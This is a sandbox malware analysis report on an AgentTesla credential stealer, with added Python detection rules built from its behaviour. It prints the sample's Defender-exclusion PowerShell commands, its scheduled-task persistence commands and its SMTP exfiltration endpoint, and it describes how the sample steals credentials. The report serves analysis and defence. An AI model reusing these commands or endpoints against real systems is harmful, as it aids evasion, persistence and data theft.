Windows Analysis Report
DOCUMENTS.exe

Overview

General Information

Sample name: DOCUMENTS.exe
Analysis ID: 1427366
MD5: e8cf42736f27344d295f0154e8f51097
SHA1: 162fc94fff43fb35b2612ce4ecfdf1cc1c7a68a1
SHA256: 2ecbed1e01a6404917129a03e0820fbae016372fadda8c057603a78a55fecd4c
Tags: AgentTesla, exe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • DOCUMENTS.exe (PID: 7304 cmdline: "C:\Users\user\Desktop\DOCUMENTS.exe" MD5: E8CF42736F27344D295F0154E8F51097)
    • powershell.exe (PID: 7768 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DOCUMENTS.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7832 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 824 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7888 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bgURAojpNNIb" /XML "C:\Users\user\AppData\Local\Temp\tmp1DED.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 8036 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 8044 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • bgURAojpNNIb.exe (PID: 8136 cmdline: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe MD5: E8CF42736F27344D295F0154E8F51097)
    • schtasks.exe (PID: 6800 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bgURAojpNNIb" /XML "C:\Users\user\AppData\Local\Temp\tmp35EA.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 736 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
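The process tree above is what a detection has to catch: PowerShell adding a Defender exclusion for the sample and for its dropped copy, schtasks.exe creating the "Updates\bgURAojpNNIb" task from an XML file in the user's Temp folder, and RegSvcs.exe started without arguments as the injection host. The following is an added example, not code from Joe Sandbox or from the report: it runs three rules modelled on the report's Sigma hits over constructed Sysmon-style process-creation events. The command lines are the report's own; the explorer.exe parent, the benign control events and the -EncodedCommand variant are assumptions. One caveat the report's Sigma data shows: the sample is 32-bit, so the System32 paths it passes are redirected to SysWOW64 and the logged Image differs from the command line, which is why the rules match on the executable basename rather than the full path.

```python
"""Added example (not part of the Joe Sandbox report): detection logic for the
process tree above, run over constructed Sysmon-style process-creation events.
Three rules mirror the report's Sigma hits: a Defender exclusion added through
PowerShell (plain or -EncodedCommand), schtasks /Create fed an XML file from a
temp folder, and an argument-less RegSvcs.exe spawned by a user-profile binary."""
import base64
import re
from dataclasses import dataclass

SYS32_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WOW64_PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
DOCUMENTS = r"C:\Users\user\Desktop\DOCUMENTS.exe"
REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

# Constructed variant (assumption, not from the report): the same exclusion hidden
# behind -EncodedCommand, which the report's second PowerShell Sigma rule targets.
ENCODED = base64.b64encode(
    "Add-MpPreference -ExclusionPath 'C:\\Users\\user\\AppData\\Roaming\\bgURAojpNNIb.exe'"
    .encode("utf-16-le")).decode()

EVENTS = [  # constructed from the report's command lines, plus benign controls
    {"pid": 4000, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 7304, "ppid": 4000, "image": DOCUMENTS, "cmd": f'"{DOCUMENTS}"'},
    {"pid": 7768, "ppid": 7304, "image": WOW64_PS,
     "cmd": f'"{SYS32_PS}" Add-MpPreference -ExclusionPath "{DOCUMENTS}"'},
    {"pid": 7888, "ppid": 7304, "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmd": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bgURAojpNNIb" '
            r'/XML "C:\Users\user\AppData\Local\Temp\tmp1DED.tmp"'},
    {"pid": 8036, "ppid": 7304, "image": REGSVCS, "cmd": f'"{REGSVCS}"'},
    # controls (assumed): admin exclusion typed at an explorer-launched console,
    # a vendor task created from ProgramData, and the encoded variant from the sample
    {"pid": 9001, "ppid": 4000, "image": WOW64_PS,
     "cmd": r'powershell.exe Add-MpPreference -ExclusionPath "D:\Builds"'},
    {"pid": 9002, "ppid": 4000, "image": r"C:\Windows\System32\schtasks.exe",
     "cmd": r'schtasks.exe /Create /TN "Vendor\Update" /XML "C:\ProgramData\Vendor\update.xml"'},
    {"pid": 9003, "ppid": 7304, "image": WOW64_PS,
     "cmd": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
]

TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\|\\Windows\\Temp\\|%(temp|tmp)%", re.I)
USER_PROFILE = re.compile(r"^[a-z]:\\Users\\", re.I)
INJECTION_HOSTS = {"regsvcs.exe"}  # the .NET host the report shows; extend as needed


@dataclass(frozen=True)
class Finding:
    rule: str
    pid: int
    detail: str


def tokenize(cmd):
    """Split a Windows command line, keeping double- or single-quoted arguments whole."""
    return [dq or sq or bare
            for dq, sq, bare in re.findall(r'''"([^"]*)"|'([^']*)'|(\S+)''', cmd)]


def arg_after(toks, flag):
    """Value following a case-insensitive flag such as /XML or -ExclusionPath, or ''."""
    lower = [t.lower() for t in toks]
    i = lower.index(flag) if flag in lower else -1
    return toks[i + 1] if 0 <= i < len(toks) - 1 else ""


def powershell_script(toks):
    """Tokens of the script PowerShell will actually run: decode -EncodedCommand
    (base64 of UTF-16LE) when present, otherwise the arguments after the binary."""
    for flag in ("-encodedcommand", "-enc", "-ec", "-e"):
        blob = arg_after(toks, flag)
        if blob:
            try:
                return tokenize(base64.b64decode(blob).decode("utf-16-le"))
            except (ValueError, UnicodeDecodeError):
                return []
    return toks[1:]


def detect(events):
    by_pid = {e["pid"]: e for e in events}
    out = []
    for e in events:
        parent = by_pid.get(e["ppid"], {}).get("image", "<unknown>")
        name = e["image"].rsplit("\\", 1)[-1].lower()  # basename: WOW64 redirection changes the directory
        toks = tokenize(e["cmd"])
        if name == "powershell.exe":
            script = powershell_script(toks)
            flag = next((t for t in script if t.lower().startswith("-exclusion")), "")
            if flag and any(t.lower() == "add-mppreference" for t in script):
                sev = "high" if USER_PROFILE.match(parent) else "medium"
                out.append(Finding("defender_exclusion", e["pid"],
                                   f"{sev}: {flag} {arg_after(script, flag.lower())} (parent {parent})"))
        elif name == "schtasks.exe" and "/create" in [t.lower() for t in toks]:
            xml = arg_after(toks, "/xml")
            if TEMP_DIR.search(xml):
                out.append(Finding("schtasks_xml_from_temp", e["pid"],
                                   f"task {arg_after(toks, '/tn')} from {xml} (parent {parent})"))
        elif name in INJECTION_HOSTS and len(toks) == 1 and USER_PROFILE.match(parent):
            out.append(Finding("dotnet_host_no_args", e["pid"],
                               f"{name} started with no arguments by {parent}"))
    return out


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f.rule, f.pid, f.detail)
```

Severity on the exclusion rule is driven by the parent: Add-MpPreference typed from an explorer-launched console is still reported, as the Sigma rule would report it, but a parent under C:\Users\ is what separates this sample from an administrator. The schtasks rule keys on the /XML argument rather than the task name, because the task name is attacker-chosen and the temp-folder XML is the part the sample cannot easily avoid.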
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
No configs have been found
Yara matches (PCAP)
Source | Rule | Description | Author
dump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Yara matches (memory dumps)
Source | Rule | Description | Author
0000000D.00000002.1395584296.00000000030A0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000012.00000002.2533846228.0000000002B1E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000000D.00000002.1395584296.00000000030A8000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000000D.00000002.1393894903.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000000D.00000002.1393894903.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
(5 of 18 entries shown)

Yara matches (unpacked PE files)
Source | Rule | Description | Author
1.2.DOCUMENTS.exe.4ab9de8.1.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
1.2.DOCUMENTS.exe.4ab9de8.1.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
1.2.DOCUMENTS.exe.4ab9de8.1.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen
  Matched strings:
  • 0x316cb $s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x3173d $s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x317c7 $s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x31859 $s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x318c3 $s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x31935 $s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x319cb $s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x31a5b $s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
14.2.bgURAojpNNIb.exe.3bd6948.3.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
14.2.bgURAojpNNIb.exe.3bd6948.3.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
(5 of 22 entries shown)

                      System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DOCUMENTS.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DOCUMENTS.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DOCUMENTS.exe", ParentImage: C:\Users\user\Desktop\DOCUMENTS.exe, ParentProcessId: 7304, ParentProcessName: DOCUMENTS.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DOCUMENTS.exe", ProcessId: 7768, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DOCUMENTS.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DOCUMENTS.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DOCUMENTS.exe", ParentImage: C:\Users\user\Desktop\DOCUMENTS.exe, ParentProcessId: 7304, ParentProcessName: DOCUMENTS.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DOCUMENTS.exe", ProcessId: 7768, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bgURAojpNNIb" /XML "C:\Users\user\AppData\Local\Temp\tmp35EA.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bgURAojpNNIb" /XML "C:\Users\user\AppData\Local\Temp\tmp35EA.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe, ParentImage: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe, ParentProcessId: 8136, ParentProcessName: bgURAojpNNIb.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bgURAojpNNIb" /XML "C:\Users\user\AppData\Local\Temp\tmp35EA.tmp", ProcessId: 6800, ProcessName: schtasks.exe
Source: Network Connection; Author: frack113; Data: DestinationIp: 162.222.226.100, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 8044, Protocol: tcp, SourceIp: 192.168.2.10, SourceIsIpv6: false, SourcePort: 49708
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bgURAojpNNIb" /XML "C:\Users\user\AppData\Local\Temp\tmp1DED.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bgURAojpNNIb" /XML "C:\Users\user\AppData\Local\Temp\tmp1DED.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\DOCUMENTS.exe", ParentImage: C:\Users\user\Desktop\DOCUMENTS.exe, ParentProcessId: 7304, ParentProcessName: DOCUMENTS.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bgURAojpNNIb" /XML "C:\Users\user\AppData\Local\Temp\tmp1DED.tmp", ProcessId: 7888, ProcessName: schtasks.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DOCUMENTS.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DOCUMENTS.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DOCUMENTS.exe", ParentImage: C:\Users\user\Desktop\DOCUMENTS.exe, ParentProcessId: 7304, ParentProcessName: DOCUMENTS.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DOCUMENTS.exe", ProcessId: 7768, ProcessName: powershell.exe

                      Persistence and Installation Behavior

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bgURAojpNNIb" /XML "C:\Users\user\AppData\Local\Temp\tmp1DED.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bgURAojpNNIb" /XML "C:\Users\user\AppData\Local\Temp\tmp1DED.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\DOCUMENTS.exe", ParentImage: C:\Users\user\Desktop\DOCUMENTS.exe, ParentProcessId: 7304, ParentProcessName: DOCUMENTS.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bgURAojpNNIb" /XML "C:\Users\user\AppData\Local\Temp\tmp1DED.tmp", ProcessId: 7888, ProcessName: schtasks.exe

Snort IDS alerts for network traffic (all TCP, destination port 587, classtype "A Network Trojan was detected")
Timestamp | SID | Source port | Destination port
04/17/24-15:08:20.936584 | 2855542 | 49708 | 587
04/17/24-15:08:20.936584 | 2855245 | 49708 | 587
04/17/24-15:08:25.918218 | 2855542 | 49710 | 587
04/17/24-15:08:25.918218 | 2855245 | 49710 | 587
04/17/24-15:08:25.918218 | 2840032 | 49710 | 587
04/17/24-15:08:20.936584 | 2851779 | 49708 | 587
04/17/24-15:08:25.917883 | 2839723 | 49710 | 587
04/17/24-15:08:20.936511 | 2839723 | 49708 | 587
04/17/24-15:08:25.918218 | 2851779 | 49710 | 587
04/17/24-15:08:25.917883 | 2030171 | 49710 | 587
04/17/24-15:08:20.936584 | 2840032 | 49708 | 587
04/17/24-15:08:20.936511 | 2030171 | 49708 | 587

AV Detection

Source: DOCUMENTS.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Avira: detection malicious, Label: HEUR/AGEN.1309705
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Virustotal: Detection: 35%
Source: DOCUMENTS.exe | ReversingLabs: Detection: 44%
Source: DOCUMENTS.exe | Virustotal: Detection: 35%
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe | Joe Sandbox ML: detected
Source: DOCUMENTS.exe | Joe Sandbox ML: detected
Source: DOCUMENTS.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: DOCUMENTS.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\DOCUMENTS.exe | File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx
Source: C:\Users\user\Desktop\DOCUMENTS.exe | File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\NULL
Source: C:\Users\user\Desktop\DOCUMENTS.exe | File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe
Source: C:\Users\user\Desktop\DOCUMENTS.exe | File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat
Source: C:\Users\user\Desktop\DOCUMENTS.exe | File opened: C:\Users\user\AppData\Local\Temp\acrocef_low\NULL
Source: C:\Users\user\Desktop\DOCUMENTS.exe | File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat\NULL
Source: C:\Users\user\Desktop\DOCUMENTS.exe | Code function: 4x nop then jmp 071B2CB0h (1_2_071B2D8A)
Source: C:\Users\user\Desktop\DOCUMENTS.exe | Code function: 4x nop then jmp 071B2CB0h (1_2_071B2DDF)
Source: C:\Users\user\Desktop\DOCUMENTS.exe | Code function: 4x nop then jmp 071B2CB0h (1_2_071B2FD8)

                      Networking

Source: Traffic | Snort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.10:49708 -> 162.222.226.100:587
Source: Traffic | Snort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.10:49708 -> 162.222.226.100:587
Source: Traffic | Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.10:49708 -> 162.222.226.100:587
Source: Traffic | Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.10:49708 -> 162.222.226.100:587
Source: Traffic | Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.10:49708 -> 162.222.226.100:587
Source: Traffic | Snort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.10:49708 -> 162.222.226.100:587
Source: Traffic | Snort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.10:49710 -> 162.222.226.100:587
Source: Traffic | Snort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.10:49710 -> 162.222.226.100:587
Source: Traffic | Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.10:49710 -> 162.222.226.100:587
Source: Traffic | Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.10:49710 -> 162.222.226.100:587
Source: Traffic | Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.10:49710 -> 162.222.226.100:587
Source: Traffic | Snort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.10:49710 -> 162.222.226.100:587
Source: global traffic | TCP traffic: 192.168.2.10:49708 -> 162.222.226.100:587
Source: Joe Sandbox View | IP Address: 162.222.226.100
Source: Joe Sandbox View | ASN Name: PUBLIC-DOMAIN-REGISTRYUS
Source: global traffic | TCP traffic: 192.168.2.10:49708 -> 162.222.226.100:587
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | DNS traffic detected: queries for: mail.thelamalab.com
Source: RegSvcs.exe, 0000000D.00000002.1395584296.00000000030A8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000012.00000002.2533846228.0000000002B26000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mail.thelamalab.com
Source: DOCUMENTS.exe, 00000001.00000002.1357702369.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, bgURAojpNNIb.exe, 0000000E.00000002.1415939466.0000000002B78000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: DOCUMENTS.exe, 00000001.00000002.1359470128.0000000004A7F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1393894903.0000000000402000.00000040.00000400.00020000.00000000.sdmp, bgURAojpNNIb.exe, 0000000E.00000002.1418243148.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://account.dyn.com/
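Every Snort alert on this page, including the one named for Telegram exfiltration, sits on the same two port-587 TCP flows from RegSvcs.exe (PID 8044) to 162.222.226.100, next to a DNS query for mail.thelamalab.com, so the traffic a network rule has to catch here is SMTP submission from a process that is not a mail client. The following is an added example, not part of the Joe Sandbox report: it runs that rule over constructed Sysmon-style DNS (EventID 22) and network-connection (EventID 3) events. PID, image, ports, destination address and hostname follow the report; which process issued the DNS query, the name-to-address mapping and the benign control flows are assumptions, with the control addresses taken from RFC 5737 documentation ranges.

```python
"""Added example (not part of the Joe Sandbox report): the network side of the
detection, over constructed Sysmon-style DNS (EventID 22) and network-connection
(EventID 3) events modelled on the traffic in the report.  It flags outbound
connections to mail ports from processes that are not mail clients, labels the
destination with the name the same process queried, counts flows per process,
and marks hits on the report's IOCs."""
from collections import defaultdict

REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
MAIL_PORTS = {25, 465, 587}
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}  # assumed allowlist; tune per estate
IOC_IPS = {"162.222.226.100"}                      # from the report
IOC_HOSTS = {"mail.thelamalab.com"}                # from the report

# Constructed events. PID, image, ports, address and host follow the report; the
# process behind the DNS query and the answer are assumptions, as are the two
# control flows (RFC 5737 addresses).
EVENTS = [
    {"id": 22, "pid": 8044, "image": REGSVCS, "query": "mail.thelamalab.com",
     "answers": ["162.222.226.100"]},
    {"id": 3, "pid": 8044, "image": REGSVCS, "proto": "tcp", "src": "192.168.2.10",
     "sport": 49708, "dst": "162.222.226.100", "dport": 587},
    {"id": 3, "pid": 8044, "image": REGSVCS, "proto": "tcp", "src": "192.168.2.10",
     "sport": 49710, "dst": "162.222.226.100", "dport": 587},
    # control: a real mail client submitting on 587 is allowed
    {"id": 3, "pid": 5000, "image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "proto": "tcp", "src": "192.168.2.10", "sport": 50001, "dst": "203.0.113.25", "dport": 587},
    # control: the same PID on a non-mail port is out of scope for this rule
    {"id": 3, "pid": 8044, "image": REGSVCS, "proto": "tcp", "src": "192.168.2.10",
     "sport": 50002, "dst": "198.51.100.7", "dport": 443},
]


def detect(events):
    """Return one finding per mail-port flow from a non-mail-client process."""
    # (pid, answer IP) -> queried name, so a flow can be labelled with its hostname
    resolved = {(e["pid"], ip): e["query"]
                for e in events if e["id"] == 22 for ip in e["answers"]}
    flows = defaultdict(list)
    findings = []
    for e in events:
        if e["id"] != 3 or e["proto"] != "tcp" or e["dport"] not in MAIL_PORTS:
            continue
        image = e["image"].rsplit("\\", 1)[-1].lower()
        if image in MAIL_CLIENTS:
            continue
        host = resolved.get((e["pid"], e["dst"]), "")
        flows[e["pid"]].append(e["sport"])
        findings.append({
            "rule": "smtp_from_non_mail_client",
            "pid": e["pid"],
            "image": image,
            "dst": f'{e["dst"]}:{e["dport"]}',
            "host": host,
            "ioc": e["dst"] in IOC_IPS or host in IOC_HOSTS,
        })
    for f in findings:  # repeated flows from one PID: retries or exfil batches
        f["flows"] = len(flows[f["pid"]])
    return findings


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f)
```

The allowlist is deliberately by image basename, matching the Sigma rule's style; a stricter deployment would also require the mail client to be signed and installed under Program Files, since an injected process can inherit any name its host has. The IOC flag is secondary: the rule fires on behaviour (a .NET utility speaking to a mail submission port) and would fire on the next build of this sample even after the mail host changes.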

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 1.2.DOCUMENTS.exe.4ab9de8.1.raw.unpack, oAKy.cs | .Net Code: _0Wk

